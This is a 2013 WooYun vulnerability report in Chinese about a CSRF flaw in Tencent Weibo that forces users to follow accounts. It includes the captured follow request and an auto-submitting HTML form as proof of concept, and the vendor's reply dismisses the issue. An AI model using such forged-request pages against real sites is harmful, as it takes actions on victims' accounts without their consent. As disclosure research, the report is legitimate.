当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022677

漏洞标题:腾讯微博CSRF刷粉丝漏洞-4

相关厂商:腾讯

漏洞作者: se55i0n

提交时间:2013-04-28 15:19

修复时间:2013-04-28 15:46

公开时间:2013-04-28 15:46

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-28: 细节已通知厂商并且等待厂商处理中
2013-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有段时间没来发洞子了!

详细说明:

1)问题还是出在新功能上,但是这会导致另一个结果,所以还是发出来;发现在发布一个段子的时候,有个收听趣多多微博的的隐藏操作;

1.png


2)我们抓包得到的数据如下;

POST /641010080/weibo/friends/add?g_tk=1329581857 HTTP/1.1
Host: labs.api.act.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ......
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
Referer: http://qdd.act.qq.com/swf/duanzi.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 19
name=zhiyaoquduoduo


3)还是拿wooyun微博来做测试吧,先取消收听wooyun微博,运行以下POC;

3.png


<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://labs.api.act.qq.com/641010080/weibo/friends/add?g_tk=1329581857 " method="POST">
<input type="hidden" name="name" value="wooyun2">
<input type="submit" value="submit" />
</form>
<script>
document.se55i0n.submit();
</script>
</body>
</html>


4)运行效果如下图;

2.png


5)刷新下页面,已经成功收听wooyun官方微博;

4.png

漏洞证明:

见详细说明

修复方案:

你们懂的

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-28 15:46

厂商回复:

感谢反馈,这里有使用token验证来防御CSRF漏洞。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-04-28 15:20 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    关注未来的二哥

  2. 2013-04-28 15:50 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    不严谨啊

  3. 2013-04-28 15:50 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @xsser 我已经开始面壁了

  4. 2013-04-28 16:05 | 狗肉盖饭 ( 路人 | Rank:10 漏洞数:1 | 狗肉盖饭,我的最爱!)

    g_tk=1329581857